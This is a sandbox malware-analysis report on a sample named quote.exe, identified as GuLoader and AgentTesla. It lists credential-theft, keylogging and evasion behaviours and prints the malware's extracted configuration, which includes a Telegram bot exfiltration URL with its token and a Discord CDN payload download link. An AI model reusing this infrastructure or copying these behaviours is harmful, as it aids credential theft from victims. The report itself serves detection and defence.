Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
quote.exe

Overview

General Information

Sample Name:quote.exe
Analysis ID:687701
MD5:016eaf77df40f3bea1aab54078a6c7a8
SHA1:7316ae0f00a564f246fa4c40512844fc9181e691
SHA256:185b5f59975f52135981264900e89f09492956426ef0d309d0407c381b76a622
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • quote.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\quote.exe" MD5: 016EAF77DF40F3BEA1AAB54078A6C7A8)
    • CasPol.exe (PID: 5136 cmdline: "C:\Users\user\Desktop\quote.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "5270570406", "Chat URL": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument"}
{"C2 url": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000000.1203658482.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            Timestamp:192.168.11.20149.154.167.220497514432851779 08/22/22-01:57:41.268148
            SID:2851779
            Source Port:49751
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: quote.exeVirustotal: Detection: 8%Perma Link
            Source: quote.exe.2056.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5270570406", "Chat URL": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument"}
            Source: CasPol.exe.5136.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendMessage"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208BB5C8 CryptUnprotectData,3_2_208BB5C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208BB5C0 CryptUnprotectData,3_2_208BB5C0
            Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.11.20:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49751 version: TLS 1.2
            Source: quote.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_0040676F FindFirstFileW,FindClose,0_2_0040676F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B23
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

            Networking

            barindex
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49751 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da83e555899ef5Host: api.telegram.orgContent-Length: 1017Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
            Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000003.00000002.6087003472.000000001D7C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6090829072.000000001D8BA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6089723936.000000001D884000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.1358554320.000000001C641000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6090278935.000000001D8A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://EqRFUPx5nMTltlK0UH.org
            Source: CasPol.exe, 00000003.00000002.6090829072.000000001D8BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: quote.exe, 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: lang-1038.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: lang-1038.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: CasPol.exe, 00000003.00000002.6062722042.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf
            Source: CasPol.exe, 00000003.00000003.1302876294.000000000162A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6064988096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000003.00000003.1302876294.000000000162A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6064988096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: quote.exe, 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: lang-1038.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: lang-1038.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: lang-1038.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: quote.exe, 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: lang-1038.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: lang-1038.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: quote.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: quote.exe, 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: lang-1038.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: lang-1038.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: CasPol.exe, 00000003.00000002.6090430298.000000001D8A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vDnRAK.com
            Source: lang-1038.dll.0.drString found in binary or memory: http://www.avast.com0/
            Source: lang-1038.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%t-
            Source: CasPol.exe, 00000003.00000002.6090430298.000000001D8A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000003.00000002.6090430298.000000001D8A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocumentdocument-----
            Source: CasPol.exe, 00000003.00000002.6058869094.000000000159B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
            Source: CasPol.exe, 00000003.00000002.6058405656.0000000001590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf
            Source: CasPol.exe, 00000003.00000002.6088337726.000000001D822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000003.00000002.6088337726.000000001D822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000003.00000002.6088337726.000000001D822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000003.00000002.6088337726.000000001D822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000003.00000002.6088337726.000000001D822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: quote.exe, 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownHTTP traffic detected: POST /bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da83e555899ef5Host: api.telegram.orgContent-Length: 1017Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.11.20:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49751 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_2089D110 SetWindowsHookExW 0000000D,00000000,?,?3_2_2089D110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_004055B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004055B8
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_004074580_2_00407458
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_00406C810_2_00406C81
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_6F491B5F0_2_6F491B5F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8F8750_2_02C8F875
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C911B10_2_02C911B1
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C866D90_2_02C866D9
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C876DD0_2_02C876DD
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80EDF0_2_02C80EDF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80ADF0_2_02C80ADF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81EEB0_2_02C81EEB
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C862E40_2_02C862E4
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C89AFF0_2_02C89AFF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8F6F50_2_02C8F6F5
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C93EF40_2_02C93EF4
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8128D0_2_02C8128D
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8668F0_2_02C8668F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80E970_2_02C80E97
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81EA10_2_02C81EA1
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C806BC0_2_02C806BC
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C89EB70_2_02C89EB7
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C91E4B0_2_02C91E4B
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C802450_2_02C80245
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80E5B0_2_02C80E5B
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C806680_2_02C80668
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8627E0_2_02C8627E
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81E000_2_02C81E00
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C802000_2_02C80200
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C89E030_2_02C89E03
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81E060_2_02C81E06
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C87A1B0_2_02C87A1B
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C9161D0_2_02C9161D
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C806110_2_02C80611
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80E130_2_02C80E13
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80A3D0_2_02C80A3D
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A3C20_2_02C8A3C2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C90BD10_2_02C90BD1
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81FE30_2_02C81FE3
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C92BFA0_2_02C92BFA
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80BF60_2_02C80BF6
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81F8F0_2_02C81F8F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8779F0_2_02C8779F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C813AB0_2_02C813AB
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C807A20_2_02C807A2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C803BF0_2_02C803BF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80BB40_2_02C80BB4
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C813490_2_02C81349
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8074C0_2_02C8074C
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80B4D0_2_02C80B4D
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8036F0_2_02C8036F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81F740_2_02C81F74
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8030A0_2_02C8030A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C813140_2_02C81314
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80F390_2_02C80F39
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C814CF0_2_02C814CF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C830D20_2_02C830D2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C808EE0_2_02C808EE
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C820FF0_2_02C820FF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C810F20_2_02C810F2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A8840_2_02C8A884
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8109C0_2_02C8109C
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C814900_2_02C81490
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C800A50_2_02C800A5
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C804BD0_2_02C804BD
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C808480_2_02C80848
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C810430_2_02C81043
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80C580_2_02C80C58
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8045A0_2_02C8045A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C800540_2_02C80054
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C814550_2_02C81455
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A8600_2_02C8A860
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C820790_2_02C82079
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8000F0_2_02C8000F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C800010_2_02C80001
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C808060_2_02C80806
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C804070_2_02C80407
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8141A0_2_02C8141A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C820200_2_02C82020
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C810240_2_02C81024
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A03E0_2_02C8A03E
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C871CA0_2_02C871CA
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C801C50_2_02C801C5
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C931DD0_2_02C931DD
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C821DD0_2_02C821DD
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C809D30_2_02C809D3
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C909EE0_2_02C909EE
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C811F20_2_02C811F2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A58A0_2_02C8A58A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8218F0_2_02C8218F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C805950_2_02C80595
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C809970_2_02C80997
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C86DAE0_2_02C86DAE
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C805AF0_2_02C805AF
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C81DA40_2_02C81DA4
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C869BE0_2_02C869BE
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80DB30_2_02C80DB3
